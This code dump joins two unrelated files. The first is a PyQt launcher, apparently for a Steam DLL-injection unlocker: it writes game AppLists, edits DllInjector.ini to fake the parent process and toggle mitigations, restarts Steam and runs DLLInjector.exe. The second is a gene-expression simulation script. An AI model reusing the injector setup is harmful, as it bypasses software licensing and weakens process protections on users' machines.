        self.main_window = Ui_MainWindow()
        self.main_window.setupUi(self)
        self.setup()
        self.connect_components()
        # Placeholder thread so search_thread always exists before first use.
        self.search_thread = SearchThread("")
    def setup(self):
        # One-time UI initialization: hide overlay windows, load config
        # values into widgets, populate lists, and register shortcuts.
        self.setWindowIcon(QIcon("icon.ico"))
        # Hidde Other Windows
        self.main_window.profile_create_window.setHidden(True)
        self.main_window.searching_frame.setHidden(True)
        self.main_window.set_steam_path_window.setHidden(True)
        self.main_window.closing_steam.setHidden(True)
        self.main_window.generic_popup.setHidden(True)
        self.main_window.settings_window.setHidden(True)
        #-------
        self.main_window.version_label.setText("v{0}".format(core.CURRENT_VERSION))
        self.main_window.no_hook_checkbox.setChecked(core.config.no_hook)
        self.main_window.compatibility_mode_checkbox.setChecked(core.config.compatibility_mode)
        self.populate_list(self.main_window.games_list, games)
        self.main_window.games_list.dropEvent = self.drop_event_handler
        self.populate_table(self.main_window.search_result)
        self.show_profile_names()
        self.show_profile_games(profile_manager.profiles[self.main_window.profile_selector.currentText()])
        self.setup_steam_path()
        self.setup_search_table()
        # self.main_window.main_panel.raise_()
        # Settings Window Setup
        self.main_window.update_checkbox.setChecked(core.config.check_update)
        # Shortcuts
        del_game = QShortcut(QKeySequence(Qt.Key_Delete), self.main_window.games_list)
        del_game.activated.connect(self.remove_selected)
    def connect_components(self):
        # Wire every UI signal to its handler, grouped by window/area.
        # Profile
        self.main_window.create_profile.clicked.connect(lambda : self.toggle_widget(self.main_window.profile_create_window))
        self.main_window.create_profile_btn.clicked.connect(self.create_profile)
        self.main_window.cancel_profile_btn.clicked.connect(lambda : self.toggle_widget(self.main_window.profile_create_window))
        self.main_window.profile_selector.currentTextChanged.connect(self.select_profile)
        self.main_window.remove_game.clicked.connect(self.remove_selected)
        self.main_window.delete_profile.clicked.connect(self.delete_profile)
        # Steam Path
        self.main_window.save_steam_path.clicked.connect(self.set_steam_path)
        self.main_window.cancel_steam_path_btn.clicked.connect(lambda : self.toggle_widget(self.main_window.set_steam_path_window))
        # Search Area
        self.main_window.search_btn.clicked.connect(self.search_games)
        self.main_window.game_search_text.returnPressed.connect(self.search_games)
        self.main_window.add_to_profile.clicked.connect(self.add_selected)
        # Main Buttons
        self.main_window.generate_btn.clicked.connect(self.generate_app_list)
        self.main_window.run_GLR_btn.clicked.connect(lambda : self.show_popup("This will restart Steam if it's open do you want to continue?", self.run_GLR))
        # Settings Window
        self.main_window.settings_btn.clicked.connect(lambda : self.toggle_widget(self.main_window.settings_window))
        self.main_window.settings_save_btn.clicked.connect(self.save_settings)
        self.main_window.settings_cancel_btn.clicked.connect(lambda : self.toggle_widget(self.main_window.settings_window))
        # Popup Window
        self.main_window.popup_btn2.clicked.connect(lambda : self.toggle_widget(self.main_window.generic_popup, True))
    # Profile Functions
    def create_profile(self):
        # Create a profile from the name field and select it.
        name = self.main_window.profile_name.text()
        if name != "":
            profile_manager.create_profile(name)
            self.main_window.profile_selector.addItem(name)
            self.main_window.profile_name.clear()
            self.main_window.profile_selector.setCurrentIndex(self.main_window.profile_selector.count() - 1)
        self.toggle_widget(self.main_window.profile_create_window)
    def delete_profile(self):
        # The "default" profile can never be deleted.
        name = self.main_window.profile_selector.currentText()
        if name == "default":
            return
        profile_manager.remove_profile(name)
        index = self.main_window.profile_selector.currentIndex()
        self.main_window.profile_selector.removeItem(index)
    def select_profile(self, name):
        # Persist the selection so it is restored on next launch.
        with core.get_config() as config:
            config.last_profile = name
        self.show_profile_games(profile_manager.profiles[name])
    def show_profile_games(self, profile):
        list_ = self.main_window.games_list
        self.populate_list(list_, profile.games)
    def show_profile_names(self):
        # Put the last-used profile first, then the rest.
        data = profile_manager.profiles.values()
        if core.config.last_profile in profile_manager.profiles.keys():
            self.main_window.profile_selector.addItem(core.config.last_profile)
        for item in data:
            if item.name != core.config.last_profile:
                self.main_window.profile_selector.addItem(item.name)
    # Search Functions
    def search_games(self):
        # Kick off a Steamdb query on a worker thread; results arrive via
        # search_games_done.
        query = self.main_window.game_search_text.text()
        if query == "":
            return
        self.toggle_hidden(self.main_window.searching_frame)
        self.search_thread = SearchThread(query)
        self.search_thread.signal.connect(self.search_games_done)
        self.search_thread.start()
    def search_games_done(self, result):
        # `result` is a list on success; anything else means a network error.
        if type(result) is list:
            self.toggle_hidden(self.main_window.searching_frame)
            self.populate_table(self.main_window.search_result,result)
        else:
            self.toggle_hidden(self.main_window.searching_frame)
            self.show_popup("Can't connect to Steamdb. Check if you have internet connection.", lambda : self.toggle_widget(self.main_window.generic_popup, True))
    def setup_search_table(self):
        h_header = self.main_window.search_result.horizontalHeader()
        h_header.setSectionResizeMode(1,QHeaderView.Stretch)
        h_header.setSectionResizeMode(0,QHeaderView.ResizeToContents)
        h_header.setMaximumSectionSize(620)
    # NOTE(review): `data=[]` is a mutable default argument; harmless here
    # because it is never mutated, but worth cleaning up.
    def populate_table(self, table: QTableView, data=[]):
        model = TableModel(data)
        sortable_model = QSortFilterProxyModel(model)
        sortable_model.setSourceModel(model)
        table.setModel(sortable_model)
    def populate_list(self, list_, data):
        list_.clear()
        for item in data:
            list_.addItem(item.name)
    # Search Table and Profile Interaction Functions
    def add_selected(self):
        # Add the games selected in the search table to the current profile.
        items = [selected.data() for selected in self.main_window.search_result.selectedIndexes()]
        if len(items) == 0:
            return
        profile = profile_manager.profiles[self.main_window.profile_selector.currentText()]
        for game in core.Game.from_table_list(items):
            if game not in profile.games:
                profile.add_game(game)
        self.show_profile_games(profile)
        profile.export_profile()
    def remove_selected(self):
        # Remove the games selected in the profile list from the profile.
        items = self.main_window.games_list.selectedItems()
        if len(items) == 0:
            return
        profile = profile_manager.profiles[self.main_window.profile_selector.currentText()]
        for item in items:
            profile.remove_game(item.text())
        self.show_profile_games(profile)
        profile.export_profile()
    # Settings Functions
    def save_settings(self):
        with core.get_config() as config:
            config.steam_path = self.main_window.settings_steam_path.text()
            config.check_update = self.main_window.update_checkbox.isChecked()
        self.toggle_widget(self.main_window.settings_window)
    # Generation Functions
    def run_GLR(self):
        # Regenerate the AppList, rewrite DLLInjector.ini according to the
        # current settings, shut down Steam if running, then launch the
        # injector and close this window.
        self.toggle_widget(self.main_window.generic_popup,True)
        if not self.generate_app_list(False):
            return
        args = ["DLLInjector.exe", "-DisablePreferSystem32Images"]
        self.replaceConfig("CreateFiles", " 1")
        self.replaceConfig("FileToCreate_1", " NoQuestion.bin")
        with core.get_config() as config:
            config.no_hook = self.main_window.no_hook_checkbox.isChecked()
            config.compatibility_mode = self.main_window.compatibility_mode_checkbox.isChecked()
        # if : else used instead of ternary operator for better readability
        if core.config.compatibility_mode:
            self.replaceConfig("EnableMitigationsOnChildProcess"," 0")
        else:
            self.replaceConfig("EnableMitigationsOnChildProcess"," 1")
        if core.config.no_hook:
            self.replaceConfig("Exe"," Steam.exe")
            self.replaceConfig("WaitForProcessTermination"," 0")
            self.replaceConfig("EnableFakeParentProcess"," 1")
            self.replaceConfig("CreateFiles", " 2")
            self.replaceConfig("FileToCreate_2", " NoHook.bin", True)
        else:
            self.replaceConfig("Exe"," Steam.exe -inhibitbootstrap")
            self.replaceConfig("WaitForProcessTermination"," 1")
            self.replaceConfig("EnableFakeParentProcess"," 0")
        core.os.chdir(core.config.steam_path)
        if self.is_steam_running():
            self.toggle_widget(self.main_window.closing_steam)
            subprocess.run(["Steam.exe", "-shutdown"]) #Shutdown Steam
            # Poll until all Steam processes have exited.
            while self.is_steam_running():
                core.time.sleep(1)
            core.time.sleep(1)
        subprocess.Popen(args)
        self.close()
    def generate_app_list(self, popup = True):
        # Write the AppList folder for the current profile; returns False
        # (with a popup) when the profile has no games.
        selected_profile = profile_manager.profiles[self.main_window.profile_selector.currentText()]
        if len(selected_profile.games) == 0:
            self.show_popup("No games to generate.", lambda : self.toggle_widget(self.main_window.generic_popup,True))
            return False
        core.createFiles(selected_profile.games)
        if(popup):
            self.show_popup("AppList Folder Generated", lambda : self.toggle_widget(self.main_window.generic_popup, True))
        return True
    # Util Functions
    def toggle_hidden(self, widget):
        widget.setHidden(not widget.isHidden())
        self.repaint()
    def toggle_enable(self, widget):
        widget.setEnabled(not widget.isEnabled())
    def toggle_widget(self, widget, force_close = False):
        # Show/hide an overlay widget, raising it above (or lowering it
        # below) the main panel; force_close always hides it.
        if force_close:
            widget.lower()
            widget.setHidden(True)
            widget.setEnabled(False)
            return
        if widget.isHidden():
            widget.raise_()
        else:
            widget.lower()
        self.toggle_hidden(widget)
        self.toggle_enable(widget)
    def set_steam_path(self):
        path = self.main_window.steam_path.text()
        if not path == "":
            with core.get_config() as config:
                config.steam_path = path
            self.toggle_widget(self.main_window.set_steam_path_window)
    def setup_steam_path(self):
        # Prompt for the Steam path on first run (empty config value).
        if core.config.steam_path != "":
            self.main_window.settings_steam_path.setText(core.config.steam_path)
            return
        self.toggle_widget(self.main_window.set_steam_path_window)
    def drop_event_handler(self, event):
        # Dragging rows from the search table onto the games list adds them.
        self.add_selected()
    def show_popup(self, message, callback):
        # NOTE(review): popup_btn1 accumulates a new connection on every
        # call; previously connected callbacks are never disconnected.
        self.main_window.popup_text.setText(message)
        self.main_window.popup_btn1.clicked.connect(callback)
        self.toggle_widget(self.main_window.generic_popup)
    def is_steam_running(self):
        for process in psutil.process_iter():
            if process.name() == "Steam.exe" or process.name() == "SteamService.exe" or process.name() == "steamwebhelper.exe" or process.name() == "DLLInjector.exe":
                return True
        return False
    def replaceConfig(self, name, new_value, append = False):
        # Rewrite `name = value` in DLLInjector.ini in place; optionally
        # append the key when it was not found.
        found = False
        with fileinput.input(core.config.steam_path + "/DllInjector.ini", inplace=True) as fp:
            for line in fp:
                if not line.startswith("#"):
                    tokens = line.split("=")
                    if tokens[0].strip() == name:
                        found = True
                        tokens[1] = new_value
                        line = "=".join(tokens) + "\n"
                print(line, end = "")
        if append and not found:
            with open(core.config.steam_path + "/DllInjector.ini", "at") as f:
                f.write("\n{0} = {1}".format(name, new_value))
class SearchThread(QThread):
    # Runs the network-bound game search off the UI thread and delivers
    # the result (list on success, error object otherwise) via `signal`.
    signal = pyqtSignal('PyQt_PyObject')
    def __init__(self, query):
        super(SearchThread, self).__init__()
        self.query = query
    def run(self):
        result = core.queryGames(self.query)
        self.signal.emit(result)
class TableModel(QAbstractTableModel):
    """Read-only table model over search results: rows of (Id, Name, Type)."""

    def __init__(self, datain=None, parent=None):
        super().__init__(parent=parent)
        # `datain=None` sentinel avoids the shared mutable-default pitfall
        # of the previous `datain=[]` signature (backward compatible).
        self.datain = [] if datain is None else datain

    def rowCount(self, parent=QModelIndex()):
        return len(self.datain)

    def columnCount(self, parent=QModelIndex()):
        return 3

    def data(self, index: QModelIndex, role=Qt.DisplayRole):
        if index.isValid() and role == Qt.DisplayRole:
            return f"{self.datain[index.row()][index.column()]}"
        # Center the "Type" column; everything else gets the default.
        if index.column() == 2 and role == Qt.TextAlignmentRole:
            return Qt.AlignCenter
        return QVariant()

    def headerData(self, index, QtOrientation, role=Qt.DisplayRole):
        names = ["Id", "Name", "Type"]
        if role == Qt.DisplayRole:
            return names[index]
        return QVariant()

    def flags(self, index):
        # Only the "Name" column may be dragged into a profile list.
        # (Restores the non-drag branch, which was truncated by a dangling
        # `|` in the original source.)
        if index.column() == 1:
            return Qt.ItemIsEnabled | Qt.ItemIsSelectable | Qt.ItemIsDragEnabled
        return Qt.ItemIsEnabled | Qt.ItemIsSelectable
<filename>archive/scripts/functions/generate_data.py
'''
Author: <NAME>
Date Created: 30 August 2019
Scripts to generate simulated data, simulated data with different numbers of experiments, permuted version of simulated data
'''
import os
import ast
import pandas as pd
import numpy as np
import random
import glob
import pickle
from keras.models import load_model
from sklearn import preprocessing
import warnings
warnings.filterwarnings(action='ignore')
from numpy.random import seed
randomState = 123
def get_sample_ids(experiment_id):
    '''
    Return sample ids for a given experiment id.

    Looks up "data/metadata/sample_annotations.tsv" relative to the
    repository root (two levels above the current working directory) and
    returns the 'ml_data_source' values of the rows indexed by
    *experiment_id*.

    Arguments
    ----------
    experiment_id: str
        Experiment accession used as the metadata index

    Returns
    --------
    list of str
        Sample ids annotated for the experiment
    '''
    base_dir = os.path.abspath(os.path.join(os.getcwd(), "../.."))

    # metadata file
    mapping_file = os.path.join(
        base_dir,
        "data",
        "metadata",
        "sample_annotations.tsv")

    # Read in metadata
    metadata = pd.read_table(
        mapping_file,
        header=0,
        sep='\t',
        index_col=0)

    selected_metadata = metadata.loc[experiment_id]

    # .loc returns a Series when the id matches a single row and a DataFrame
    # when it matches several.  The old code always called list(...) on the
    # selection, which in the single-row case split the lone sample id
    # string into individual characters.
    if isinstance(selected_metadata, pd.Series):
        sample_ids = [selected_metadata['ml_data_source']]
    else:
        sample_ids = list(selected_metadata['ml_data_source'])

    return sample_ids
def simulate_compendium(
    experiment_ids_file,
    num_simulated_experiments,
    normalized_data_file,
    NN_architecture,
    analysis_name
):
    '''
    Generate simulated data by randomly sampling some number of experiments
    and linearly shifting the gene expression in the VAE latent space.

    Workflow:
    1. Input gene expression data from 1 experiment (here we are assuming
       that there is only biological variation within this experiment)
    2. Encode this input into a latent space using the trained VAE model
    3. For each encoded feature, sample from a distribution using the
       mean and standard deviation for that feature
    4. Decode the samples

    Arguments
    ----------
    experiment_ids_file: str
        File containing all cleaned experiment ids
    num_simulated_experiments: int
        Number of experiments to simulate
    normalized_data_file: str
        File containing normalized gene expression data

        ------------------------------| PA0001 | PA0002 |...
        05_PA14000-4-2_5-10-07_S2.CEL | 0.8533 | 0.7252 |...
        54375-4-05.CEL                | 0.7789 | 0.7678 |...
        ...                           | ...    | ...    |...

    NN_architecture: str
        Name of neural network architecture to use.
        Format 'NN_<intermediate layer>_<latent layer>'
    analysis_name: str
        Name of analysis. Format 'analysis_<int>'

    Returns
    --------
    simulated_data_file: str
        File containing simulated gene expression data
        (written to <local_dir>/Data/Batch_effects/simulated/<analysis_name>/)
    '''
    # Only numpy's generator is seeded here; all sampling below uses np.random.
    seed(randomState)

    # Create directory to output simulated data.
    # NOTE(review): both paths are relative to the current working
    # directory, so this function must be run from the expected location.
    base_dir = os.path.abspath(os.path.join(os.getcwd(), "../.."))
    local_dir = os.path.abspath(os.path.join(os.getcwd(), "../../../.."))

    new_dir = os.path.join(local_dir, "Data", "Batch_effects", "simulated")

    analysis_dir = os.path.join(new_dir, analysis_name)

    if os.path.exists(analysis_dir):
        print('Directory already exists: \n {}'.format(analysis_dir))
    else:
        print('Creating new directory: \n {}'.format(analysis_dir))
    os.makedirs(analysis_dir, exist_ok=True)
    print('\n')

    # Files
    NN_dir = base_dir + "/models/" + NN_architecture
    # Latent dimension is encoded as the last '_'-separated token of the
    # architecture name; converted to int further below.
    latent_dim = NN_architecture.split('_')[-1]

    model_encoder_file = glob.glob(os.path.join(
        NN_dir,
        "*_encoder_model.h5"))[0]

    weights_encoder_file = glob.glob(os.path.join(
        NN_dir,
        "*_encoder_weights.h5"))[0]

    model_decoder_file = glob.glob(os.path.join(
        NN_dir,
        "*_decoder_model.h5"))[0]

    weights_decoder_file = glob.glob(os.path.join(
        NN_dir,
        "*_decoder_weights.h5"))[0]

    # Load saved models
    loaded_model = load_model(model_encoder_file)
    loaded_decode_model = load_model(model_decoder_file)

    loaded_model.load_weights(weights_encoder_file)
    loaded_decode_model.load_weights(weights_decoder_file)

    # Read data
    experiment_ids = pd.read_table(
        experiment_ids_file,
        header=0,
        sep='\t',
        index_col=0)

    # Transposed so rows are samples and columns are genes.
    normalized_data = pd.read_table(
        normalized_data_file,
        header=0,
        sep='\t',
        index_col=0).T

    print("Normalized gene expression data contains {} samples and {} genes".format(
        normalized_data.shape[0], normalized_data.shape[1]))

    # Simulate data
    simulated_data_df = pd.DataFrame()

    # Experiments are sampled WITH replacement, one per iteration.
    for i in range(num_simulated_experiments):
        selected_experiment_id = np.random.choice(
            experiment_ids['experiment_id'], size=1)[0]

        # Get corresponding sample ids
        sample_ids = get_sample_ids(selected_experiment_id)

        # Remove any missing sample ids
        sample_ids = list(filter(str.strip, sample_ids))

        # Remove any sample_ids that are not found in gene expression data
        # There are some experiments where most samples have gene expression but a few do not
        sample_ids = [
            sample for sample in sample_ids if sample in normalized_data.index]

        # Gene expression data for selected samples
        selected_data_df = normalized_data.loc[sample_ids]

        # Encode selected experiment into latent space
        data_encoded = loaded_model.predict_on_batch(selected_data_df)
        data_encoded_df = pd.DataFrame(
            data_encoded, index=selected_data_df.index)

        # Get centroid of original data
        centroid = data_encoded_df.mean(axis=0)

        # Add individual vectors(centroid, sample point) to new_centroid

        # Encode original gene expression data into latent space
        # NOTE(review): this encoding of the FULL compendium is loop-invariant
        # and is recomputed on every iteration.
        data_encoded_all = loaded_model.predict_on_batch(
            normalized_data)
        data_encoded_all_df = pd.DataFrame(
            data_encoded_all, index=normalized_data.index)

        data_encoded_all_df.head()

        # Find a new location in the latent space by sampling from the latent space
        encoded_means = data_encoded_all_df.mean(axis=0)
        encoded_stds = data_encoded_all_df.std(axis=0)

        latent_dim = int(latent_dim)
        new_centroid = np.zeros(latent_dim)

        for j in range(latent_dim):
            new_centroid[j] = np.random.normal(
                encoded_means[j], encoded_stds[j])

        # Shift the whole experiment so its centroid lands on the sampled point.
        shift_vec_df = new_centroid - centroid

        simulated_data_encoded_df = data_encoded_df.apply(
            lambda x: x + shift_vec_df, axis=1)

        # Decode simulated data into raw gene space
        simulated_data_decoded = loaded_decode_model.predict_on_batch(
            simulated_data_encoded_df)

        simulated_data_decoded_df = pd.DataFrame(simulated_data_decoded,
                                                 index=simulated_data_encoded_df.index,
                                                 columns=selected_data_df.columns)

        # Add experiment label
        simulated_data_decoded_df["experiment_id"] = selected_experiment_id + \
            "_" + str(i)

        # Concatenate dataframe per experiment together
        simulated_data_df = pd.concat(
            [simulated_data_df, simulated_data_decoded_df])

    # re-normalize per gene 0-1
    simulated_data_numeric_df = simulated_data_df.drop(
        columns=['experiment_id'], inplace=False)

    simulated_data_scaled = preprocessing.MinMaxScaler(
    ).fit_transform(simulated_data_numeric_df)

    simulated_data_scaled_df = pd.DataFrame(simulated_data_scaled,
                                            columns=simulated_data_numeric_df.columns,
                                            index=simulated_data_numeric_df.index)

    simulated_data_scaled_df['experiment_id'] = simulated_data_df['experiment_id']

    # If sampling with replacement, then there will be multiple sample ids that are the same
    # therefore we want to reset the index.
    simulated_data_scaled_df.reset_index(drop=True, inplace=True)

    print(simulated_data_scaled_df.shape)

    # Remove expression data for samples that have duplicate sample id across
    # different experiment ids
    # We remove these because we are not sure which experiment the sample should
    # belong to
    # simulated_data_scaled_df = simulated_data_scaled_df.loc[~simulated_data_scaled_df.index.duplicated(
    #     keep=False)]

    print("Return: simulated gene expression data containing {} samples and {} genes".format(
        simulated_data_scaled_df.shape[0], simulated_data_scaled_df.shape[1]))

    # Save
    simulated_data_file = os.path.join(
        local_dir,
        "Data",
        "Batch_effects",
        "simulated",
        analysis_name,
        "simulated_data.txt.xz")

    simulated_data_scaled_df.to_csv(
        simulated_data_file, float_format='%.3f', sep='\t', compression='xz')
def simulate_data(
    normalized_data_file,
    NN_architecture,
    analysis_name,
    num_simulated_samples
):
    '''
    Generate simulated data by sampling from VAE latent space.

    Workflow:
    1. Input gene expression data from 1 experiment (here we are assuming
       that there is only biological variation within this experiment)
    2. Encode this input into a latent space using the trained VAE model
    3. For each encoded feature, sample from a distribution using the
       mean and standard deviation for that feature
    4. Decode the samples

    Arguments
    ----------
    normalized_data_file: str
        File containing normalized gene expression data

        ------------------------------| PA0001 | PA0002 |...
        05_PA14000-4-2_5-10-07_S2.CEL | 0.8533 | 0.7252 |...
        54375-4-05.CEL                | 0.7789 | 0.7678 |...
        ...                           | ...    | ...    |...

    NN_architecture: str
        Name of neural network architecture to use.
        Format 'NN_<intermediate layer>_<latent layer>'
    analysis_name: str
        Name of analysis. Format 'analysis_<int>'
    num_simulated_samples: int
        Number of samples to simulate

    Returns
    --------
    simulated_data_file: str
        File containing simulated gene expression data
        (written to <local_dir>/Data/Batch_effects/simulated/<analysis_name>/)
    '''
    # Only numpy's generator is seeded; all sampling below uses np.random.
    seed(randomState)

    # Create directory to output simulated data.
    # NOTE(review): paths are relative to the current working directory.
    base_dir = os.path.abspath(os.path.join(os.getcwd(), "../.."))
    local_dir = os.path.abspath(os.path.join(os.getcwd(), "../../../.."))

    new_dir = os.path.join(local_dir, "Data", "Batch_effects", "simulated")

    analysis_dir = os.path.join(new_dir, analysis_name)

    if os.path.exists(analysis_dir):
        print('Directory already exists: \n {}'.format(analysis_dir))
    else:
        print('Creating new directory: \n {}'.format(analysis_dir))
    os.makedirs(analysis_dir, exist_ok=True)
    print('\n')

    # Files
    NN_dir = base_dir + "/models/" + NN_architecture

    model_encoder_file = glob.glob(os.path.join(
        NN_dir,
        "*_encoder_model.h5"))[0]

    weights_encoder_file = glob.glob(os.path.join(
        NN_dir,
        "*_encoder_weights.h5"))[0]

    model_decoder_file = glob.glob(os.path.join(
        NN_dir,
        "*_decoder_model.h5"))[0]

    weights_decoder_file = glob.glob(os.path.join(
        NN_dir,
        "*_decoder_weights.h5"))[0]

    # Load saved models
    loaded_model = load_model(model_encoder_file)
    loaded_decode_model = load_model(model_decoder_file)

    loaded_model.load_weights(weights_encoder_file)
    loaded_decode_model.load_weights(weights_decoder_file)

    # Read data (transposed so rows are samples, columns are genes)
    normalized_data = pd.read_table(
        normalized_data_file,
        header=0,
        sep='\t',
        index_col=0).T

    print("Normalized gene expression data contains {} samples and {} genes".format(
        normalized_data.shape[0], normalized_data.shape[1]))

    # Simulate data

    # Encode into latent space
    data_encoded = loaded_model.predict_on_batch(normalized_data)
    data_encoded_df = pd.DataFrame(data_encoded, index=normalized_data.index)

    latent_dim = data_encoded_df.shape[1]

    # Get mean and standard deviation per encoded feature
    encoded_means = data_encoded_df.mean(axis=0)
    encoded_stds = data_encoded_df.std(axis=0)

    # Generate samples: each latent feature is drawn independently from a
    # normal fit to that feature's empirical mean/std.
    new_data = np.zeros([num_simulated_samples, latent_dim])
    for j in range(latent_dim):
        # Use mean and std for feature
        new_data[:, j] = np.random.normal(
            encoded_means[j], encoded_stds[j], num_simulated_samples)

        # Use standard normal
        # new_data[:,j] = np.random.normal(0, 1, num_simulated_samples)

    new_data_df = pd.DataFrame(data=new_data)

    # Decode samples
    new_data_decoded = loaded_decode_model.predict_on_batch(new_data_df)
    simulated_data = pd.DataFrame(data=new_data_decoded)

    print("Return: simulated gene expression data containing {} samples and {} genes".format(
        simulated_data.shape[0], simulated_data.shape[1]))

    # Output
    # return simulated_data
    simulated_data_file = os.path.join(
        local_dir,
        "Data",
        "Batch_effects",
        "simulated",
        analysis_name,
        "simulated_data.txt.xz")

    simulated_data.to_csv(
        simulated_data_file, float_format='%.3f', sep='\t', compression='xz')
def permute_data(simulated_data_file,
                 local_dir,
                 analysis_name):
    '''
    Permute the simulated data: shuffle the expression values within each
    sample (row) independently, producing a negative control that keeps
    per-sample value distributions but destroys gene structure.

    Arguments
    ----------
    simulated_data_file: str
        File containing simulated gene expression data (tab-delimited,
        sample ids in the first column)
    local_dir: str
        Parent directory containing data files
    analysis_name: str
        Name of analysis. Format 'analysis_<int>'

    Returns
    --------
    permuted_simulated_data_file: str
        File containing permuted simulated gene expression data
        to be used as a negative control in similarity analysis.
    '''
    # Seed BOTH generators.  `seed` only seeds numpy, but the shuffling
    # below uses the stdlib `random` module, so previously the permutation
    # was not reproducible despite the seed call.
    seed(randomState)
    random.seed(randomState)

    # Read in data
    simulated_data = pd.read_table(
        simulated_data_file,
        header=0,
        index_col=0,
        sep='\t')

    # The experiment label is not expression data; drop it before shuffling.
    if "experiment_id" in list(simulated_data.columns):
        simulated_data.drop(columns="experiment_id", inplace=True)

    # Shuffle values within each sample (row)
    # Each sample treated independently
    shuffled_simulated_arr = []
    num_samples = simulated_data.shape[0]

    for i in range(num_samples):
        row = list(simulated_data.values[i])
        # random.sample without replacement over the whole row == permutation
        shuffled_simulated_row = random.sample(row, len(row))
        shuffled_simulated_arr.append(shuffled_simulated_row)

    shuffled_simulated_data = pd.DataFrame(shuffled_simulated_arr,
                                           index=simulated_data.index,
                                           columns=simulated_data.columns)

    # Output
    # return shuffled_simulated_data
    permuted_simulated_data_file = os.path.join(
        local_dir,
        "Data",
        "Batch_effects",
        "simulated",
        analysis_name,
        "permuted_simulated_data.txt.xz")

    shuffled_simulated_data.to_csv(
        permuted_simulated_data_file, float_format='%.3f', sep='\t', compression='xz')
def add_experiments(
        simulated_data_file,
        num_experiments,
        local_dir,
        analysis_name):
    '''
    Say we are interested in identifying genes that differentiate between
    disease vs normal states. However our dataset includes samples from
    different tissues or time points and there are variations
    in gene expression that are due to these other conditions
    and do not have to do with disease state.

    These non-relevant variations in the data are called batch effects.

    We want to model these batch effects. To do this we will:
    1. Partition our simulated data into n batches
    2. For each partition we will shift all genes using a vector of values
       sampled from a gaussian distribution centered around 0.
    3. Repeat this for each partition
    4. Append all batch effect partitions together

    Arguments
    ----------
    simulated_data_file: str
        File containing simulated gene expression data (xz-compressed tsv)
    num_experiments: list
        List of different numbers of experiments to add to
        simulated data
    local_dir: str
        Parent directory containing data files
    analysis_name: str
        Name of analysis. Format 'analysis_<int>'

    Returns
    --------
    Files of simulated data with different numbers of experiments added.
    Each file named as "Experiment_<number of experiments added>"
    '''
    seed(randomState)

    # Create directories
    new_dir = os.path.join(
        local_dir,
        "Data",
        "Batch_effects",
        "experiment_simulated")

    analysis_dir = os.path.join(new_dir, analysis_name)

    if os.path.exists(analysis_dir):
        print('Directory already exists: \n {}'.format(analysis_dir))
    else:
        print('Creating new directory: \n {}'.format(analysis_dir))
    os.makedirs(analysis_dir, exist_ok=True)
    print('\n')

    # Read in data
    simulated_data = pd.read_table(
        simulated_data_file,
        header=0,
        index_col=0,
        compression='xz',
        sep='\t')

    # Add batch effects
    num_simulated_samples = simulated_data.shape[0]
    num_genes = simulated_data.shape[1]

    # Create an array of the simulated data indices
    simulated_ind = np.array(simulated_data.index)

    for i in num_experiments:
        print('Creating simulated data with {} experiments..'.format(i))

        experiment_file = os.path.join(
            local_dir,
            "Data",
            "Batch_effects",
            "experiment_simulated",
            analysis_name,
            "Experiment_" + str(i) + ".txt.xz")

        experiment_map_file = os.path.join(
            local_dir,
            "Data",
            "Batch_effects",
            "experiment_simulated",
            analysis_name,
            "Experiment_map_" + str(i) + ".txt.xz")

        # Create dataframe with grouping
        experiment_data_map = simulated_data.copy()

        if i == 1:
            # A single "experiment": pass the data through unchanged.
            simulated_data.to_csv(experiment_file, sep='\t', compression='xz')

            # Add experiment id to map dataframe
            experiment_data_map['experiment'] = str(i)
            # NOTE: ndarray.sort() sorts in place and returns None, so
            # pandas receives index=None and keeps the Series' own index.
            # Left unchanged to preserve the existing on-disk output.
            experiment_data_map_df = pd.DataFrame(
                data=experiment_data_map['experiment'], index=simulated_ind.sort())

            experiment_data_map_df.to_csv(
                experiment_map_file, sep='\t', compression='xz')
        else:
            experiment_data = simulated_data.copy()

            # Shuffle indices
            np.random.shuffle(simulated_ind)

            # Partition indices to batch
            # Note: 'array_split' will chunk data into almost equal sized chunks.
            # Returns arrays of size N % i and one array with the remainder
            partition = np.array_split(simulated_ind, i)

            for j in range(i):
                # Vector (one value per gene) to shift gene expression data
                stretch_factor = np.random.normal(0.0, 0.2, [1, num_genes])

                # Tile stretch_factor to be able to add to batches.
                num_samples_per_experiment = len(partition[j])
                # Use np.tile directly: the `pd.np` alias used here before
                # was deprecated and removed in pandas 2.0.
                stretch_factor_tile = pd.DataFrame(
                    np.tile(
                        stretch_factor,
                        (num_samples_per_experiment, 1)),
                    index=experiment_data.loc[partition[j].tolist()].index,
                    columns=experiment_data.loc[partition[j].tolist()].columns)

                # Add experiments
                experiment_data.loc[partition[j].tolist(
                )] = experiment_data.loc[partition[j].tolist()] + stretch_factor_tile

                # Add experiment id to map dataframe
                experiment_data_map.loc[partition[j], 'experiment'] = str(j)
                experiment_data_map_df = pd.DataFrame(
                    data=experiment_data_map['experiment'], index=simulated_ind.sort())

            # Save
            experiment_data.to_csv(
                experiment_file, float_format='%.3f', sep='\t', compression='xz')

            experiment_data_map_df.to_csv(
                experiment_map_file, sep='\t', compression='xz')
def add_experiments_grped(
        simulated_data_file,
        num_partitions,
        local_dir,
        analysis_name):
    '''
    Say we are interested in identifying genes that differentiate between
    disease vs normal states. However our dataset includes samples from
    different tissues or time points and there are variations
    in gene expression that are due to these other conditions
    and do not have to do with disease state.

    These non-relevant variations in the data are called batch effects.

    We want to model these batch effects. To do this we will:
    1. Partition our simulated data into n batches

       Here we are keeping track of experiment id and partitioning
       such that all samples from an experiment are in the same
       partition.

       Note: Partition sizes will be different since experiment
       sizes are different per experiment.

    2. For each partition we will shift all genes using a vector of values
       sampled from a gaussian distribution centered around 0.
    3. Repeat this for each partition
    4. Append all batch effect partitions together

    Arguments
    ----------
    simulated_data_file: str
        File containing simulated gene expression data (xz-compressed tsv,
        including an "experiment_id" label column)
    num_partitions: list
        List of different numbers of partitions to add
        technical variations to
    local_dir: str
        Parent directory containing data files
    analysis_name: str
        Name of analysis. Format 'analysis_<int>'

    Returns
    --------
    Files of simulated data with different numbers of experiments added.
    Each file named as "Partition_<number of partitions added>"
    '''
    seed(randomState)

    # Create directories
    new_dir = os.path.join(
        local_dir,
        "Data",
        "Batch_effects",
        "partition_simulated")

    analysis_dir = os.path.join(new_dir, analysis_name)

    if os.path.exists(analysis_dir):
        print('Directory already exists: \n {}'.format(analysis_dir))
    else:
        print('Creating new directory: \n {}'.format(analysis_dir))
    os.makedirs(analysis_dir, exist_ok=True)
    print('\n')

    # Read in data
    simulated_data = pd.read_table(
        simulated_data_file,
        header=0,
        index_col=0,
        compression='xz',
        sep='\t')

    # Add batch effects
